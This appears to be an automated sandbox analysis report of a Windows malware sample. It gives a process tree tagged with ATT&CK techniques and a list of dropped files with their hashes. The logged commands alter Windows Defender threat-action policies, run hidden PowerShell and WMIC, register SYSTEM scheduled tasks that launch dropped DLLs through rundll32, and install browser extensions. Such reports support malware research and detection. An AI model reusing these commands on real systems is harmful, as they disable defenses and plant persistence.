                                                                                                              • C:\Windows\system32\gpscript.exe
                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                1⤵
                                                                                                                  PID:5692
                                                                                                                • C:\Windows\Temp\EfDQwjblbGMYTvUW\iofAWDeBylnRwgX\dPTnSev.exe
                                                                                                                  C:\Windows\Temp\EfDQwjblbGMYTvUW\iofAWDeBylnRwgX\dPTnSev.exe Bn /FNzqdidsO 385107 /S
                                                                                                                  1⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops Chrome extension
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:5972
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                    2⤵
                                                                                                                      PID:5312
                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                        3⤵
                                                                                                                        • Indirect Command Execution
                                                                                                                        PID:5524
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                          4⤵
                                                                                                                            PID:1988
                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                              5⤵
                                                                                                                                PID:4784
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                            3⤵
                                                                                                                            • Indirect Command Execution
                                                                                                                            PID:3832
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                              4⤵
                                                                                                                                PID:868
                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                  5⤵
                                                                                                                                    PID:4044
                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                3⤵
                                                                                                                                • Indirect Command Execution
                                                                                                                                PID:1740
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                  4⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:1784
                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                    5⤵
                                                                                                                                      PID:1136
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                  3⤵
                                                                                                                                  • Indirect Command Execution
                                                                                                                                  PID:216
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                    4⤵
                                                                                                                                      PID:3688
                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                        5⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:428
                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                    3⤵
                                                                                                                                    • Indirect Command Execution
                                                                                                                                    PID:5600
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                      4⤵
                                                                                                                                        PID:5376
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                          5⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • Drops file in System32 directory
                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:5380
                                                                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                            6⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:5112
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /DELETE /F /TN "bISIDNXXYteSJEZXLD"
                                                                                                                                    2⤵
                                                                                                                                      PID:5812
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                      2⤵
                                                                                                                                        PID:5100
                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                          3⤵
                                                                                                                                          • Indirect Command Execution
                                                                                                                                          PID:5716
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                            4⤵
                                                                                                                                              PID:5308
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:5864
                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                  6⤵
                                                                                                                                                    PID:6060
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZEIgHLylU\OKVVXY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "nhCxYLxLNhRYHBn" /V1 /F
                                                                                                                                            2⤵
                                                                                                                                            • Drops file in Windows directory
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5016
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TN "nhCxYLxLNhRYHBn2" /F /xml "C:\Program Files (x86)\ZEIgHLylU\nPdmJCU.xml" /RU "SYSTEM"
                                                                                                                                            2⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:2512
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /END /TN "nhCxYLxLNhRYHBn"
                                                                                                                                            2⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:4408
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /DELETE /F /TN "nhCxYLxLNhRYHBn"
                                                                                                                                            2⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:4396
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TN "zXSfdhoZUyVxvh" /F /xml "C:\Program Files (x86)\PPPhKexxKHjU2\ienRMZf.xml" /RU "SYSTEM"
                                                                                                                                            2⤵
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:2532
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TN "xvZIgXOxpyOKn2" /F /xml "C:\ProgramData\aiawRKtoMjRxlKVB\pIgBFel.xml" /RU "SYSTEM"
                                                                                                                                            2⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5728
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TN "rTsVMDZsNLtDRgdGt2" /F /xml "C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR\YjVSPNP.xml" /RU "SYSTEM"
                                                                                                                                            2⤵
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:1392
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TN "TwQsVoxFovLmRvGRRGe2" /F /xml "C:\Program Files (x86)\sJTkDUsLcXSLC\gtHoPIp.xml" /RU "SYSTEM"
                                                                                                                                            2⤵
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:624
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TN "qDiHWMOCvHNecNHUo" /SC once /ST 04:51:46 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\EfDQwjblbGMYTvUW\beaVteqL\JsYxbKb.dll\",#1 /gKbdidQq 385107" /V1 /F
                                                                                                                                            2⤵
                                                                                                                                            • Drops file in Windows directory
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5804
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /run /I /tn "qDiHWMOCvHNecNHUo"
                                                                                                                                            2⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:2592
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /DELETE /F /TN "HUfdpCtBFdwYOuoar"
                                                                                                                                            2⤵
                                                                                                                                              PID:4328
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 2276
                                                                                                                                              2⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:5844
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4972 -ip 4972
                                                                                                                                            1⤵
                                                                                                                                              PID:6064
                                                                                                                                            • C:\Windows\system32\rundll32.EXE
                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EfDQwjblbGMYTvUW\beaVteqL\JsYxbKb.dll",#1 /gKbdidQq 385107
                                                                                                                                              1⤵
                                                                                                                                                PID:2548
                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EfDQwjblbGMYTvUW\beaVteqL\JsYxbKb.dll",#1 /gKbdidQq 385107
                                                                                                                                                  2⤵
                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  PID:1008
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5972 -ip 5972
                                                                                                                                                1⤵
                                                                                                                                                  PID:5564

                                                                                                                                                Network

                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                Replay Monitor

                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                Downloads

                                                                                                                                                • C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

                                                                                                                                                  Filesize

                                                                                                                                                  129B

                                                                                                                                                  MD5

                                                                                                                                                  a526b9e7c716b3489d8cc062fbce4005

                                                                                                                                                  SHA1

                                                                                                                                                  2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                                                                  SHA256

                                                                                                                                                  e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                                                                  SHA512

                                                                                                                                                  d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                                                                • C:\Program Files (x86)\PPPhKexxKHjU2\ienRMZf.xml

                                                                                                                                                  Filesize

                                                                                                                                                  2KB

                                                                                                                                                  MD5

                                                                                                                                                  ed0b071ae66fc96f561e0c0a18a4434e

                                                                                                                                                  SHA1

                                                                                                                                                  ce54e30ae8885e250f6f4a2cb6cb9cb1478d7f22

                                                                                                                                                  SHA256

                                                                                                                                                  599db64729ed3e2adf620dab48ffb99887f511dd14f62e20f7f3b627b21acad6

                                                                                                                                                  SHA512

                                                                                                                                                  a76cce25af59d17606948e1cef6b81b25865a5fd6e7d549397fa476f36fa33f40e90d85f12f0daf6ccc01e9d2ea07ace0051eb9ca1e789f5259a0d8e7d9fc63f

                                                                                                                                                • C:\Program Files (x86)\ZEIgHLylU\nPdmJCU.xml

                                                                                                                                                  Filesize

                                                                                                                                                  2KB

                                                                                                                                                  MD5

                                                                                                                                                  09b0a0fca8e251c0134ba9921e4c8418

                                                                                                                                                  SHA1

                                                                                                                                                  2cce930798496da971a5c3990b56d3372c4056e4

                                                                                                                                                  SHA256

                                                                                                                                                  65281964ee1c6268e40402169762bd93913eb0dafb6e213f1a853f98af3329f9

                                                                                                                                                  SHA512

                                                                                                                                                  a52bda892420829d7159cfc1f85bd7f1ad8a78e6c2d0061d04915356aef9492e5eddf0bca953a6c4bfd40395ca8c3556eeabf75b8fccc82d45566a115163f1f1

                                                                                                                                                • C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR\YjVSPNP.xml

                                                                                                                                                  Filesize

                                                                                                                                                  2KB

                                                                                                                                                  MD5

                                                                                                                                                  4fb48e626d695da14a0cc2e48c36f666

                                                                                                                                                  SHA1

                                                                                                                                                  f8cb8c9f779a3eb7cb7b2eabd7ae170f681a29fc

                                                                                                                                                  SHA256

                                                                                                                                                  5267a11e76d372b396685abf3a02a43232ddb4f69d0aba20da8332b799918e3a

                                                                                                                                                  SHA512

                                                                                                                                                  56b1b061a04c0ddfbf4753d9983b11a5d9b1fe5fa443b8f9693c686614165898b03257da4cfd5bfc54d3cb41f2eda08b148ade623d2dbf5fafd3d8a1ee715f6b

                                                                                                                                                • C:\Program Files (x86)\sJTkDUsLcXSLC\gtHoPIp.xml

                                                                                                                                                  Filesize

                                                                                                                                                  2KB

                                                                                                                                                  MD5

                                                                                                                                                  a98b8d9128a85fa45b3ab10a16b35759

                                                                                                                                                  SHA1

                                                                                                                                                  6321a336989e1841affe0822c46e81341051cb8f

                                                                                                                                                  SHA256

                                                                                                                                                  ea2befe772dc5c30293987a48ae04b83716437a1ae2c462b131cc1f41ce94383

                                                                                                                                                  SHA512

                                                                                                                                                  dd57007f5cc5c4c50f296c9e8604d1ab9062ebebb3ed787f892b4fdd9a7de6db87d10090c996c0e738fb7016f11b8be7392dc35a0e96226284268b4265298e77

                                                                                                                                                • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                  Filesize

                                                                                                                                                  2.0MB

                                                                                                                                                  MD5

                                                                                                                                                  3b586f139e5ec231427f30800383dfea

                                                                                                                                                  SHA1

                                                                                                                                                  787e04ca64b0a448390836c112de3f80a1a5c3a7

                                                                                                                                                  SHA256

                                                                                                                                                  e4f26ef85f4f6862768cd6888c5f45b5d2ee19aa375fae49bc6d8bdc729845d7

                                                                                                                                                  SHA512

                                                                                                                                                  9d9b63c017a6e94363008e91f6f371a4cbd22a58ba0d3e71b9ba255d1f7c63c2b5f47074db89df87653c545c941f02fcac4d6d7ddc2af8aa4c4881fdb36e03e4

                                                                                                                                                • C:\ProgramData\aiawRKtoMjRxlKVB\pIgBFel.xml

                                                                                                                                                  Filesize

                                                                                                                                                  2KB

                                                                                                                                                  MD5

                                                                                                                                                  030a468af29deeeb4174daef37884b73

                                                                                                                                                  SHA1

                                                                                                                                                  a6a0c19b01f1773616a91d2f5f77493f80202ba7

                                                                                                                                                  SHA256

                                                                                                                                                  749bd703cd21debe0f15c74d1c2d543ebaadadf05a08a7eb9966b1cd4a637d43

                                                                                                                                                  SHA512

                                                                                                                                                  b0b08845c01bd3f780f81b97fb740b80537d9659f774aec68248e830eff5a92b817262be7e16e0fcc5db8e0bdbd9e4ddf8258594e9f14faeb15084cfc65fce2d

                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                  Filesize

                                                                                                                                                  187B

                                                                                                                                                  MD5

                                                                                                                                                  2a1e12a4811892d95962998e184399d8

                                                                                                                                                  SHA1

                                                                                                                                                  55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                  SHA256

                                                                                                                                                  32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                  SHA512

                                                                                                                                                  bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                  Filesize

                                                                                                                                                  136B

                                                                                                                                                  MD5

                                                                                                                                                  238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                  SHA1

                                                                                                                                                  0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                  SHA256

                                                                                                                                                  801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                  SHA512

                                                                                                                                                  2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                  Filesize

                                                                                                                                                  150B

                                                                                                                                                  MD5

                                                                                                                                                  0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                  SHA1

                                                                                                                                                  6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                  SHA256

                                                                                                                                                  0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                  SHA512

                                                                                                                                                  5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                  Filesize

                                                                                                                                                  2KB

                                                                                                                                                  MD5

                                                                                                                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                  SHA1

                                                                                                                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                  SHA256

                                                                                                                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                  SHA512

                                                                                                                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                  Filesize

                                                                                                                                                  1KB

                                                                                                                                                  MD5

                                                                                                                                                  def65711d78669d7f8e69313be4acf2e

                                                                                                                                                  SHA1

                                                                                                                                                  6522ebf1de09eeb981e270bd95114bc69a49cda6

                                                                                                                                                  SHA256

                                                                                                                                                  aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

                                                                                                                                                  SHA512

                                                                                                                                                  05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

                                                                                                                                                  Filesize

                                                                                                                                                  151B

                                                                                                                                                  MD5

                                                                                                                                                  bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                  SHA1

                                                                                                                                                  9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                  SHA256

                                                                                                                                                  b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                  SHA512

                                                                                                                                                  3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                  Filesize

                                                                                                                                                  944B

                                                                                                                                                  MD5

                                                                                                                                                  242864fa38cfb42f8eed89a9a80b510d

                                                                                                                                                  SHA1

                                                                                                                                                  0981832f0e0ce28fc8dc011072e9f6579d8b16de

                                                                                                                                                  SHA256

                                                                                                                                                  d409c32deeb1808a9116227000bbeb40b15a3b33bd4c2f16c97ce3b590201442

                                                                                                                                                  SHA512

                                                                                                                                                  33650c0e18790d0ee0ef772941b03728cb3aa993b79a23287fb1d3ddf17194cd7dba40539c76384d21265b64c25c38ff99ac2caa416611c6f236b0dd9634b0b5

                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                  Filesize

                                                                                                                                                  15KB

                                                                                                                                                  MD5

                                                                                                                                                  e44c6a33e8dc16144d0630135a4a33e2

                                                                                                                                                  SHA1

                                                                                                                                                  e34265b6a39df37ce791df70180102e8ed86115f

                                                                                                                                                  SHA256

                                                                                                                                                  687a77ee26c7dbe2c6ef9f8871cd812d21bec88c6d4abdbb89fdbf7bb5a9413b

                                                                                                                                                  SHA512

                                                                                                                                                  918204c4494f2db05080c8dddfb44287f241e9c09f8ff6f820061fd33b1952b0a7601b4893248f31d9627a91772b020cdd734bebad2da8c7b781d8a8a95c118c

                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                  Filesize

                                                                                                                                                  11KB

                                                                                                                                                  MD5

                                                                                                                                                  8190af16bc75fcbd0ba3eef6cfcff5c9

                                                                                                                                                  SHA1

                                                                                                                                                  aa404074a2eb133ce91fe8899dbd5708f1db1910

                                                                                                                                                  SHA256

                                                                                                                                                  a4b2f6404e9b60c0d404744549f6c6c3df6448f2bd7b60278c151a502cd3d787

                                                                                                                                                  SHA512

                                                                                                                                                  b28ded06ad6f46a64e40f958fec1082dbef116b6f5c5562f11e89193555a50789d4435d103034ee40098b3f8ffd4575400721b71b4a96126b980e1c8cb094cf7

                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                  Filesize

                                                                                                                                                  15KB

                                                                                                                                                  MD5

                                                                                                                                                  18a2b255e4e0c0356fe6cd304c91d34c

                                                                                                                                                  SHA1

                                                                                                                                                  8cd8385e01dd160489799c1e913f02377461aab5

                                                                                                                                                  SHA256

                                                                                                                                                  ed94fed59175aa6e085c4d3cc93d1821d6212e705f8867c1808b6fee4674e30d

                                                                                                                                                  SHA512

                                                                                                                                                  b23f4a0cd12431ae9983fe75a88ffc6ae0fe8fe671f0eea58380ed8f4ddb6ac67b89641d46baf9c90c46ef27e9867073ab7d6336272b70be517ad97f316f38ec

                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                  Filesize

                                                                                                                                                  11KB

                                                                                                                                                  MD5

                                                                                                                                                  6c723565efe25089696188a90d464f8c

                                                                                                                                                  SHA1

                                                                                                                                                  cb39d52de0f6b232618e108d9308eadd8b6ffb77

                                                                                                                                                  SHA256

                                                                                                                                                  13614e1028ee34f625b17477badf3e33ac021ea3e3ef30b5c18e6b009c1a7d51

                                                                                                                                                  SHA512

                                                                                                                                                  69e0695c0dea57eef154b84fe42d445cae19b1f56739cd2f82a0d13abdb6fe39c58d480c9f527f1f42d650c1c13435328a5aa74abd2a0bdb778b18faa09899a0

                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000260001\setup1.exe

                                                                                                                                                  Filesize

                                                                                                                                                  724KB

                                                                                                                                                  MD5

                                                                                                                                                  8918c448fc9bb0646edc781f8b1b6df1

                                                                                                                                                  SHA1

                                                                                                                                                  6dafed9466e7cf85fc91b0adfd6379459eec27bd

                                                                                                                                                  SHA256

                                                                                                                                                  f33516961b08be77cc412bc9ee9ec021f96cf576d71b1b204ed8a980ccbeb14b

                                                                                                                                                  SHA512

                                                                                                                                                  f2d3dd7646dfbe6b060ac625081fa699c491348d3bda45e72e74d2540ad9ab0a6ed565ca3ef8fa5d7a11a14ce5bf79a8a73824d52d486c4d0ac64e8a946e8440

                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe

                                                                                                                                                  Filesize

                                                                                                                                                  7.2MB

                                                                                                                                                  MD5

                                                                                                                                                  14a56f81287d1e037fc6405247c31d20

                                                                                                                                                  SHA1

                                                                                                                                                  7648bc39a1d198bc115e5871466fd4478f70b175

                                                                                                                                                  SHA256

                                                                                                                                                  a8b4bc268063265eba47d7325dbc3f118045c24478d740d3d69c245872ade20a

                                                                                                                                                  SHA512

                                                                                                                                                  dbd0e1ef97b5c8dd2d2d78b823140863406046cc735a1ac62edef04fa7ab6f9d9644b62cba40637d404016accecb06aab6d3c56c7a27dae05978cf9da8c42d0e

                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000267001\52i.exe

                                                                                                                                                  Filesize

                                                                                                                                                  715KB

                                                                                                                                                  MD5

                                                                                                                                                  4d190c235680b3e4481e4d7685e9a118

                                                                                                                                                  SHA1

                                                                                                                                                  17c5654e4077f9e0dd8e17e92e36696bed55557a

                                                                                                                                                  SHA256

                                                                                                                                                  4083f1ea732fd45abe2f648f824be39e3e511a59179fa7c8349d7f7f75e3d3b4

                                                                                                                                                  SHA512

